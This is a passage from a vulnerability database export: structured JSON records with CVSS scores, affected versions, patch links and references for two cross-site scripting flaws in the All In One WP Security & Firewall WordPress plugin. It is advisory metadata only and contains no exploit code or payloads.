              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202102-0407

    Vulnerability from variot - Updated: 2024-11-23 23:07

    Cross-site scripting (XSS) vulnerability in admin/wp-security-blacklist-menu.php in the Tips and Tricks HQ All In One WP Security & Firewall (all-in-one-wp-security-and-firewall) plugin before 4.4.6 for WordPress

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202102-0407",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.4.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": null
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.4.6"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "cve": "CVE-2020-29171",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-29171",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-375335",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-29171",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2020-29171",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-29171",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-29171",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202102-1017",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-375335",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site scripting (XSS) vulnerability in admin/wp-security-blacklist-menu.php in the Tips and Tricks HQ All In One WP Security \u0026 Firewall (all-in-one-wp-security-and-firewall) plugin before 4.4.6 for WordPress",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-29171",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-375335",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "id": "VAR-202102-0407",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:07:39.977000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall",
            "trust": 0.8,
            "url": "https://github.com/Arsenal21/all-in-one-wordpress-security/commit/4130906bc049b195467b4fc6980d6d304fbe28d5"
          },
          {
            "title": "Wordpress of  Tips and Tricks HQ All In One WP Security \u0026 Firewal Plugin Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=142332"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://github.com/arsenal21/all-in-one-wordpress-security/commit/4130906bc049b195467b4fc6980d6d304fbe28d5"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.7,
            "url": "https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29171"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-02-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "date": "2021-10-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "date": "2021-02-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "date": "2021-02-10T15:15:13.243000",
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-02-11T00:00:00",
            "db": "VULHUB",
            "id": "VHN-375335"
          },
          {
            "date": "2021-10-20T09:06:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          },
          {
            "date": "2021-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          },
          {
            "date": "2024-11-21T05:23:46.200000",
            "db": "NVD",
            "id": "CVE-2020-29171"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress\u00a0 for \u00a0Tips\u00a0and\u00a0Tricks\u00a0HQ\u00a0All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall\u00a0 Cross-site scripting vulnerability in plugins",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-015890"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202102-1017"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1124

    Vulnerability from variot - Updated: 2024-11-23 23:04

    The all-in-one-wp-security-and-firewall plugin before 4.0.6 for WordPress has XSS in settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. all-in-one-wp-security-and-firewall is a website security protection plugin used in it. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1124",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.6"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          }
        ]
      },
      "cve": "CVE-2016-10867",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10867",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89686",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10867",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2016-10867",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10867",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10867",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-886",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89686",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2016-10867",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.6 for WordPress has XSS in settings pages. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. all-in-one-wp-security-and-firewall is a website security protection plugin used in it. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10867",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89686",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "id": "VAR-201908-1124",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:04:40.052000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96575"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.8,
            "url": "https://wpvulndb.com/vulnerabilities/9736"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10867"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10867"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "date": "2019-08-13T18:15:11.587000",
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-03-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89686"
          },
          {
            "date": "2020-02-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10867"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          },
          {
            "date": "2024-11-21T02:44:56.640000",
            "db": "NVD",
            "id": "CVE-2016-10867"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007637"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-886"
          }
        ],
